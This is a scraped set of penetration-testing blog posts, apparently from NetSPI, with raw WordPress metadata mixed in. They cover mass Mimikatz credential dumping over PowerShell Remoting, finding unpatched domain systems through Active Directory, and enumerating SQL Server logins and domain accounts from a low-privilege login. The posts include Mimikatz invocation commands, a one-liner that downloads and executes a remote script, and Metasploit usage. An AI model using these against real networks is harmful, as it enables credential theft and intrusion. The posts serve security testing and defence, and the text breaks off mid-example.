  • Invoke-Mimikatz After Mimikatz had been around a while Joseph Bialek ported Mimikatz to PowerShell.  This was a fantastic feat that made Mimikatz even easier to use for all of us IT security enthusiasts.  It natively supports executing Mimikatz on remote systems using PowerShell Remoting as the current user.  However, I don’t believe that it supports using alternative credentials via PSCredential objects.  The Invoke-Mimikatz github repo is listed below. https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz
  • Mass Mimikatz After the Invoke-Mimikatz script was released it didn’t take long for people to start writing scripts that execute it  on a larger scale in creative ways.  Rob Fuller released the first scripts I saw that wrapped around Invoke-Mimikatz.ps1. His scripts create a file share that hosts a .cmd file, which is then executed on remote systems via WMIC commands.  The .cmd script then runs a PowerShell command on the remote systems that downloads Invoke-Mimkatz.ps1 into memory, runs it, and writes all of the passwords out to files on the hosted share.  This can all be executed from a non-domain system using alternative credentials.  His blog introducing the scripts is below. https://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
  • Invoke-MassMimikatz In an effort to streamline the process a bit, Will Schroeder created a nice PowerShell script called “Invoke-MassMimikatz.ps1”.  It hosts “Invoke-Mimikatz.ps1“ on a web server started by his script.  Then Invoke-MassMimikatz.ps1 executes encoded PowerShell commands on remote systems using the "Invoke-WmiMthod" command, which downloads and executes "Invoke-Mimikatz.ps1" in memory. All of the Mimikatz output is then parsed and displayed in the PowerShell console. Invoke-MassMimikatz can also be executed from a non-domain system using alternative credentials. So it’s similar to Rob’s scripts, but consolidates everything into one script that uses a slightly different delivery method. https://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
  • Metasploit I would be neglectful if I didn’t mention Metasploit.  It includes quite a few options for obtaining shells on remote systems.  Once you have a few active sessions its pretty easy to use the Mimikatz extension created by Ben Campbell to grab Windows credentials.  Also, Ben Turner and Dave Hardy added support for fully interactive PowerShell sessions through Metasploit that can load any PowerShell module you want when the session is created which is pretty cool.  I recommend checking out their blog below. https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/

An Overview of the Invoke-MassMimikatz-PsRemoting Script

The "Invoke-MassMimikatz-PsRemoting" script provides another way to run Mimikatz on remote systems using PowerShell Remoting, but includes a few novel options. Naturally it's based on the heavy lifting done in the other projects. For those who are interested it can be downloaded from here. Below is a summary of the script and its features:
  • It wraps the native command “Invoke-Command“ to execute Invoke-Mimikatz.ps1 on remote systems, and the Invoke-Mimikatz.ps1 script is baked in.  As a result, no files have to be hosted, because "Invoke-Command" doesn’t suffer from the 8192 character limit enforced on commands passed through Invoke-WmiMethod and wmic.
  • It supports alternative credentials and execution from a non-domain system using PSCredential objects.
  • It supports automatically creating a target list of domain computers by querying a domain controller using ADSI. Since ADSI is used, the ActiveDirectory module is not required.
  • It supports filtering for domain computers with WinRM installed by filtering the Service Principal Names.
  • It supports the option to limit the number of systems to run Mimikatz on. The default is 5.
  • It uses Will’s Mimikatz output parser to provide clean output that can be used in the PowerShell pipeline.
  • It checks if the user credentials recovered from remote systems are a Domain or Enterprise admin.

Enabling PowerShell Remoting

Ok, first things first.  Let's make sure PowerShell Remoting is all setup on the system your running it from. You should be able to use the command below.
Enable-PSRemoting –force
For more information and context check out this technet blog: https://technet.microsoft.com/en-us/magazine/ff700227.aspx If for some reason that doesn't work you can use the commands below to trouble shoot.
# Set start mode to automatic
Set-Service WinRM -StartMode Automatic

# Verify start mode 
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

# Trust all hosts
Set-Item WSMan:localhostclienttrustedhosts -value *

# Verify trusted hosts configuration
Get-Item WSMan:localhostClientTrustedHosts

Invoke-MassMimikatz-PsRemoting Function Examples

Below are a few examples. Keep in mind that the domain user used will require administrative privileges on the remote systems.  Additional information and examples can be found in commented section of the script. The function can be imported a few different ways. If you have outbound internet access you can load the function reflectively and not worry about the execution policy, but for the standard import methods the execution policy may have to be disabled/bypassed. Import examples are below.
# Import the function from the .psm1 file
Import-Module .Invoke-MassMimikatz-PsRemoting.psm1

# Import the function reflectively from an URL:
IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-MassMimikatz-PsRemoting.psm1’)
Example 1 Running the function against 10.1.1.1 as the current domain user.
Invoke-MassMimikatz-PSRemoting –Verbose –hosts “10.1.1.1”
Example 2 Running the function as the current domain user, grabbing a list of all domain systems, filtering for systems with WinRM installed, and only running Mimikatz on five of them.
Invoke-MassMimikatz-PSRemoting –Verbose –AutoTarget –MaxHost 5 -WinRM
Example 3 Using alternative domain credentials from a non-domain system, grabbing a list of all domain systems, and only running Mimikatz on one of them.
Invoke-MassMimikatz-PsRemoting –Verbose –AutoTarget -MaxHost 1 -username corpMyServerAdmin -password 'MyServerPassword!' –DomainController 10.2.9.106 | ft -AutoSize
C E B Bddc Ee D E You can then pipe to other commands or simply filter for say Enterprise Admins... Ed E Ee F F Bd B

Wrap Up

In this blog I covered some Mass Mimikatz history, and a new script that includes a few novel options. Hopefully it's been interesting to those who haven't been exposed to the topics before. Either way, don't forget to have fun and hack responsibly.

References

[post_title] => Auto-Dumping Domain Credentials using SPNs, PowerShell Remoting, and Mimikatz [post_excerpt] => In this blog I’ll cover some Mimikatz history and share my script "Invoke-MassMimikatz-PsRemoting.psm1", which tries to expand on other people's work. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => auto-dumping-domain-credentials-using-spns-powershell-remoting-and-mimikatz [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:41 [post_modified_gmt] => 2021-06-08 21:46:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=5147 [menu_order] => 547 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [46] => WP_Post Object ( [ID] => 3548 [post_author] => 17 [post_date] => 2015-05-21 07:00:47 [post_date_gmt] => 2015-05-21 07:00:47 [post_content] =>

Scanning is a pretty common first step when trying to identify Windows systems that are missing critical patches.  However, there is a faster way to start the process.  Active Directory stores the operating system version and service pack level for every Windows system associated with the domain.  Historically that information has been used during penetration tests to target systems missing patches like MS08-67, but it can also be used by blue teams to help streamline identification of high risk assets as part of their standard vulnerability management approach.  In this blog I’ll cover a high level overview of how it can be done and point to a few scripts that can be used to help automate the process.

Introduction to Computer Accounts

When a system is added to a Windows domain, a computer account is created in Active Directory. The computer account provides the computer with access to domain resources similar to a domain user account. Periodically the computer account checks in with Active Directory to do things like rotate its password, pull down group policy updates, and sync OS version and service pack information. The OS version and service pack information are then stored in Active Directory as properties which can be queried by any domain user. This makes it a great source of information for attackers and blue teamers. There is also a hotfix property associated with each computer account in Active Directory, but from what I’ve seen it’s never populated. So at some point vulnerability scanning (or at least service fingerprinting) is required to confirm that systems suffer from critical vulnerabilities.

Vulnerability Scanner Feature Requests :)

To my knowledge, none of the major vulnerability scanners use the computer account properties from Active Directory during scanning (although I haven’t reviewed them all in detail). My hope is that sometime in the near future they’ll add some options for streamlining the identification of high risk Windows assets (and potentially asset discovery) using an approach like the one below.

  1. A vulnerability scanning profile for “High Risk Windows Systems Scan” could be selected in the vulnerability scanning software. The profile could be configured with least privileged domain credentials for authenticating to Active Directory. It could also be configured with network ranges to account for systems that are not part of the domain.
  2. A vulnerability scan could be started using the profile. The scan could connect to Active Directory via LDAP or the Active Directory Web Service (ADWS) and dump all of the enabled domain computers from Active Directory along with their OS version and Service Pack level.
  3. The results could be filtered using a profile configuration setting to only show systems that have checked in with Active Directory recently. Typically, if a system hasn’t checked in with Active Directory in a month, then it's most likely been decommissioned without having its account disabled.
  4. The results could be filtered again for OS versions and service pack levels known to be out of date or unsupported.
  5. Finally, a credentialed vulnerability scan could be conducted against the supplied network ranges and the filtered list of domain systems pulled from Active Directory to help verify that they are actually vulnerable.

They may be obvious, but I’ve listed some of the advantages of this approach below:

  • High risk assets can be identified and triaged quickly.
  • Target systems don’t rely on potentially out of date asset lists.
  • The initial targeting of high risk systems does not require direct access to isolated network segments that are a pain to reach.
  • From an offensive perspective, the target enumeration usually goes undetected.

I chatted with Will Schroeder a little, and he added that it would be nice if vulnerability scanners also had an Active Directory vulnerability scanning profile to account for all of the misconfigurations that penetration testers commonly take advantage of. This could cover quite a few things including, but not limited to, insecure group policy configurations (covers a lot) and excessive priviliges related to deligated privileges, domain trusts, group inheritance, GPO inheritance, and Active Directory user/computer properties.

Automating the Process with PowerShell

Ideally it would be nice to see Active Directory data mining techniques used as part of vulnerability management programs more often.  However, I think the reality is that until the functionality comes boxed with your favorite vulnerability scanner it wont be a common practice.  While we all wait for that to happen there are a few PowerShell scripts available to help automate some of the process. I spent a little time writing a PowerShell script called “Get-ExploitableSystems.psm1” that can automate some of steps that I listed in the last section .  It was build off of work done in two great PowerShell projects: PowerTools (by Will Schroeder and Justin Warner) and Posh-SecMod (by Carlos Perez).

PowerView (which is part of the PowerTools toolkit) has a function called “Invoke-FindVulnSystems” which looks for systems that may be missing patches like MS08-67.  It’s fantastic, but I wanted to ignore disabled computer accounts, and sort by last logon dates to help determine which systems are alive without having to wait for ping replies.  Additionally, I built in a small list of relevant Metasploit modules and CVEs for quick reference.

I also wanted the ability to easily query information in Active Directory from a non-domain system.  That’s where Carlos’s PoshSec-Mod project comes in.  I used Carlos’s "Get-AuditDSComputerAccount” function as a template for authenticating to LDAP with alternative domain credentials via ADSI.

Finally, I shoved all of the results into a data table object. I've found that data tables can be really handy in PowerShell, because they allow you to dump out your dataset in a way that easily feeds into the PowerShell pipeline.  For more details take a look at the code on GitHub, but be warned – it may not be the prettiest code you’ve even seen. ;)

Get-ExploitableSystems.psm1 Examples

The Get-ExploitableSystems.psm1 module can be downloaded here.  As I mentioned, I’ve tried to write it so that the output works in the PowerShell pipeline and can be fed into other PowerShell commands like “Test-Connection” and “Export-Csv”.  Below are a few examples of standard use cases.

1. Import the module.

Import-Module Get-ExploitableSystems.psm1

2. Run the function using integrated authentication.

Get-ExploitableSystems

3. Run the function against a domain controller in a different domain and make the output pretty.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demoadministrator | Format-Table –AutoSize

4. Run the function against a domain controller in a different domain and write the output to a CSV file.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demoadministrator | Export-Csv c:tempoutput.csv –NoTypeInformation

5. If you’re still interested in pinging hosts to verify they’re up you can use the command below.

Get-ExploitableSystems -DomainController 10.2.9.100 -Credential demoadministrator | Test-Connection

Since Will is a super ninja PowerShell guru he has already integrated the Get-ExploitableSystems updates into PowerTools. So I recommend just using PowerTools moving forward.

Active Directory Web Service Example

As it turns out you can do the same thing pretty easily with Active Directory Web Services (ADWS). ADWS can be accessed via the PowerShell Active Directory module cmdlets, and basically used to manage the domain. To get them setup on a Windows 7/8 workstation you should be able to follow the instructions below.

1. Download and install "Remote Server Administration Tools" for Windows 7/8: https://www.microsoft.com/en-us/download/details.aspx?id=7887

2. In PowerShell run the following commands:

Import-Module ServerManager
Add-WindowsFeature RSAT-AD-PowerShell

3. Verify that the ActiveDirectory module is available with the following command:

Get-Module -ListAvailable

4. Import the Active Directory module.

import-module ActiveDirectory

Now you should be ready for action!

As I mentioned before, one of my requirements for the script was having the ability to dump information from a domain controller on a domain that my computer is not associated with, using alternative domain credentials. Khai Tran was nice enough to show me an easy way to do this with the Active Directory PowerShell provider. Below are the basic steps. In the example below a.b.c.d represent the target domain controller's IP address.

New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domainuser
cd RemoteADS:

Now every PowerShell AD command we run should be issued to the remote domain controller. :) I recently came across a really nice PowerShell presentation by Sean Metcalf called "Mastering PowerShell and Active Directory” that covers some useful ADWS command examples. Below is a quick code example showing how to dump active computer accounts and their OS information based on his presentation.

$tendays=(get-date).AddDays(-10);Get-ADComputer -filter {Enabled -eq $true -and LastLogonDate -gt $tendays } -Properties samaccountname,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix | select  name,Enabled,LastLogonDate,OperatingSystem,OperatingSystemServicePack,OperatingSystemHotFix | format-table -AutoSize

The script only shows enabled computer accounts that have logged in within the last 10 days. You should be able simply change the -10 if you want to go back further. However, after some reading it sounds like the "LastLogonDate" is relative to the domain controller you're querying. So to get the real "LastLogonDate" you'll have to query all of the domain controllers.

Wrap Up

In this blog I took a quick look at how common Active Directory mining techniques used by the pentest community can also be used by the blue teams to reduce the time it takes to identify high risk Windows systems in their environments. Hopefully, as time goes on, we’ll see vulnerability scanners and SIEM solutions using them too. Whatever side you’re on (red or blue) I hope the information has been useful. Have fun and hack responsibly. :)

References

[post_title] => A Faster Way to Identify High Risk Windows Assets [post_excerpt] => Thanks to the wonderfulness of Active Directory both red and blue teams can easily identify high risk Windows systems in their environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => a-faster-way-to-identify-high-risk-windows-assets [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:08 [post_modified_gmt] => 2021-06-08 21:46:08 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3548 [menu_order] => 552 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [47] => WP_Post Object ( [ID] => 2833 [post_author] => 17 [post_date] => 2015-03-16 07:00:03 [post_date_gmt] => 2015-03-16 07:00:03 [post_content] =>

Introduction

In SQL Server, security functions and views that allow SQL logins to enumerate domain objects should only be accessible to sysadmins. However, in this blog I’ll show how to enumerate Active Directory domain users, groups, and computers through native SQL Server functions using logins that only have the Public server role (everyone). I’ll also show how to enumerate SQL Server logins using a similar technique. To make the attacks more practical I’ve also released PowerShell and Metasploit modules to automate everything via direct connections and SQL injection.

This blog should be interesting to pentesters, developers, and DevOps looking to gain a better understanding of what the practical attacks look like. I’ve also provided a lab setup guide, but I recommend skipping it unless you’re interested in trying this out at home.

Below is a summary of the topics being covered:

Setting up a Lab

Below I've provided some basic steps for setting up a Windows domain, SQL Server instance, and web server that can be used to replicate the scenarios covered in this blog.

Setting up the Domain and SQL Server

  1. Setup a Windows domain. Hopefully you already have a lab setup with a Windows domain/ADS. If not, you can follow the guide found below to get rolling.
    https://social.technet.microsoft.com/wiki/contents/articles/22622.building-your-first-domain-controller-on-2012-r2.aspx
  2. Add a server to the domain that can be used as the SQL Server. Below is a link to a how to guide.
    https://technet.microsoft.com/en-us/library/bb456990.aspx
  3. Download the Microsoft SQL Server Express version that includes SQL Server Management Studio and install it on the system just added to the domain. It can be downloaded from the link below.
    https://msdn.microsoft.com/en-us/evalcenter/dn434042.aspx
  4. Install SQL Server by following the wizard, but make sure to enabled mixed-mode authentication and run the service as LocalSystem for the sake of the lab.
  5. Enable the TCP protocol so that module can connect to the listener. If you’re not familiar with that process you can use the guide found at the link below.
    https://blogs.msdn.com/b/sqlexpress/archive/2005/05/05/415084.aspx

Setting up the Database

1. Log into the SQL Server with the "sa" account setup during installation using the SQL Server Management Studio application.

2. Press the "New Query" button and use the TSQL below to create a database named "MyAppDb" for the lab.

-- Create database
CREATE DATABASE MyAppDb

3. Add a table with records.

-- Select the database
USE MyAppDb
-- Create table
CREATE TABLE dbo.NOCList (ID INT IDENTITY PRIMARY KEY,SpyName varchar(MAX) NOT NULL,RealName varchar(MAX) NULL)
-- Add sample records to table
INSERT dbo.NOCList (SpyName, RealName)
VALUES ('James Bond','Sean Connery')
INSERT dbo.NOCList (SpyName, RealName)
VALUES ('Ethan Hunt','Tom Cruise')
INSERT dbo.NOCList (SpyName, RealName)
VALUES ('Jason Bourne','Matt Damon')

4. Create a logins for the lab.

-- Create login for the web app and direct connection
CREATE LOGIN MyPublicUser WITH PASSWORD = 'MyPassword!';
ALTER LOGIN [MyPublicUser] with default_database = [MyAppDb];
CREATE USER [MyPublicUser] FROM LOGIN [MyPublicUser];
EXEC sp_addrolemember [db_datareader], [MyPublicUser];
-- Create login that should not be viewable to MyPublicUser
CREATE LOGIN MyHiddenUser WITH PASSWORD = 'MyPassword!';

5. Verify that the login only has the CONNECT privilege. The CONNECT privilege allows accounts to authenticate to the SQL Server instance.

-- Impersonate MyPublicUser
EXECUTE AS LOGIN = 'MyPublicUser'

-- List privileges
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
GO

-- Revert back to sa
REVERT

Img C C C

6. Check server roles for the MyPublicUser login. You shouldn’t see any roles assigned to the “MyPublicUser login. This bit of code was grabbed from https://www.practicalsqldba.com/2012/08/sql-server-list-logins-database-and.html.

-- Impersonate MyPublicUser
EXECUTE AS LOGIN = 'MyPublicUser'

-- Check if the login is part of public
SELECT IS_SRVROLEMEMBER ( 'Public' )

-- Check other assigned server roles
SELECT PRN.name,
srvrole.name AS [role] ,
Prn.Type_Desc
FROM sys.server_role_members membership
INNER JOIN (SELECT * FROM sys.server_principals WHERE type_desc='SERVER_ROLE') srvrole
ON srvrole.Principal_id= membership.Role_principal_id
INNER JOIN sys.server_principals PRN
ON PRN.Principal_id= membership.member_principal_id WHERE Prn.Type_Desc NOT IN ('SERVER_ROLE')

REVERT

Setting up the Web Application

  1. Setup a local IIS server
  2. Make sure its configured to process asp pages
  3. Download testing.asp to the web root from:
    https://raw.githubusercontent.com/nullbind/Metasploit-Modules/master/testing2.asp
  4. Modify the db_server, db_name,db_username,and db_password variables in testing2.asp as needed.
  5. Verify the page works by accessing:
    https://127.0.0.1/testing2.asp?id=1
  6. Verify the id parameter is injectable and error are returned:
    https://127.0.0.1/testing2.asp?id=@@version

Enumerating SQL Server Logins Manually

Selecting all of the logins from the sys.syslogins view is restricted to sysadmins. However, logins with the Public role (everyone) can quickly enumerate all SQL Server logins using the “SUSER_NAME” function. The “SUSER_NAME” function takes a principal_id number and returns the associated security principal (login or server role). Luckily, principal_id numbers are assigned incrementally. The first login gets assigned 1, the second gets assigned 2, and so on. As a result, it’s possible to fuzz the principal_id to recover a full list of SQL Server logins and roles. However, it’s not immediately obvious which principals are roles and which are logins. Fortunately, the logins can be identified through error analysis of the native “sp_defaultdb” stored procedure. Once logins have been identified, they can be used in dictionary attacks that often result in additional access to the SQL Server.

Below is an overview of the manual process:

1. Log into SQL Server using the “MyPublicUser” login with SQL Server Management Studio.

2. To start things off verify that it’s not possible to get a list of all logins via standard queries. The queries below should only return a list of default server roles, the “sa” login, and the “MyPublicUser” login. No other logins should be returned.

SELECT name FROM sys.syslogins
SELECT name FROM sys.server_principals

3. Using the “SUSER_ID” function it’s possible to lookup the principal_id for any login. The example below shows how to lookup the principal_id for the “sa” login. It should be possible with any login that has the Public role (everyone).

SELECT SUSER_ID('sa')

4. To go the other way just provide the principal_id to the “SUSER_NAME” function . Below is a short example showing how it’s possible to view other logins. In this example, the “MyHiddenUser” login’s principal_id is 314, but it will be different in your lab.

SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
SELECT SUSER_NAME(3)
SELECT SUSER_NAME(314)

5. As I mentioned above, it’s also possible to determine which security principals are logins and which are roles by performing error analysis on the “sp_defaultdb” stored procedure. When you’re a sysadmin “sp_defaultdb” can be used to change the default database for a login. However, when you’re not a sysadmin the procedure will fail due to access restrictions. Lucky for us valid logins return different errors than invalid logins.For example, the “sp_defaultdb” stored procedure always returns a “15007” msg when an invalid login is provided, and a “15151” msg when the login is valid. Below are a few example screenshots.

6. After logins have been identified it’s possible to use tools like SQLPing3, Hydra, and the mssql_login module to perform online dictionary attacks against the SQL Server. Next, let's take a look at some automation options.

Enumerating SQL Server Logins with PowerShell

The first script is written as a PowerShell module and can be used to enumerate SQL Logins via direct database connections. It can be downloaded from https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Get-SqlServer-Enum-SqlLogins.psm1.

The module can be imported with the PowerShell command below.

PS C:temp>Import-Module .Get-SqlServer-Enum-SqlLogins.psm1

After importing the module, the function can be run as the current Windows account or a SQL login can be supplied as shown below. My example returns many logins because my tests lab is messy, but at a minimum you should see the “MyHiddenUser” login that was created at the beginning of the lab guide.

Note: By default it fuzzes 300 principal_ids, but you can increase that with the “FuzzNum” parameter.

PS C:temp>Get-SqlServer-Enum-SqlLogins -SQLServerInstance "10.2.9.101" -SqlUser MyPublicUser -SqlPass MyPassword! –FuzzNum 1000

Enumerating SQL Server Logins with Metasploit

This module (mssql_enum_sql_logins) does the same thing as the PowerShell module, but is written for the Metasploit Framework. If you’ve updated Metasploit lately then you already have it. Below is a basic usage example.

Note: By default it fuzzes 300 principal_ids, but you can increase that with the “FuzzNum” parameter.

use auxiliary/admin/mssql/mssql_enum_sql_logins
set rhost 10.2.9.101
set rport 1433
set fuzznumb 1000
set username MyPublicUser
set password MyPassword!
run

Now on to the good stuff…

Enumerating Domain Accounts

In Active Directory every user, group, and computer in Active Directory has a unique identifier called an RID. Similar to the principal_id, the RID is another number that is incrementally assigned to domain objects. For a long time it’s been possible to enumerate domain users, groups, and computers by fuzzing the RIDs via RPC calls using the “smb_lookupsid” module in Metasploit written by H.D. Moore. The technique I’ve put together here is almost exactly the same, but executed through the SQL Server function “SUSER_SNAME”. As it turns out, when a full RID is supplied to the “SUSER_SNAME” function it returns the associated domain account, group, or computer name. Below I’ll walk through the manual process.

Note: As a side note “SUSER_SNAME” function can also be used to resolve SQL Login using their SID.

Manual Process for Enumerating Domain Accounts

1. Once again, log into SQL Server using the “MyPublicUser” login with SQL Server Management Studio.

2. To start things off verify that it’s not possible to execute stored procedures that provide information about domain groups or accounts. The queries below attempts to use the “xp_enumgroups” and “xp_logininfo” stored procedures to get domain group information from the domain associated with the SQL Server. They should fail, because they’re normally only accessible to member of the sysadmin server role.

EXEC xp_enumgroups 'DEMO';
EXEC xp_logininfo 'DEMODomain Admins', 'members';

3. Ok, on with the show. As an attacker that knows nothing about the environment we’ll need to start by getting the domain name of the SQL Server using the query below.

SELECT DEFAULT_DOMAIN() as mydomain;

4. Next we need to use the “SUSER_SID” function to get a sample RID from the domain of the SQL Server. You can use any default domain users or group. In the example below I’ve used “Domain Admins”.

SELECT SUSER_SID('DEMODomain Admins')

5. Once a full RID has been obtained we can to extract the domain SID by grabbing the first 48 bytes. The domain SID is the unique identifier for the domain and the base of every full RID. After we have the SID we can start building our own RIDs and get fuzzing.

RID = 0x0105000000000005150000009CC30DD479441EDEB31027D0000200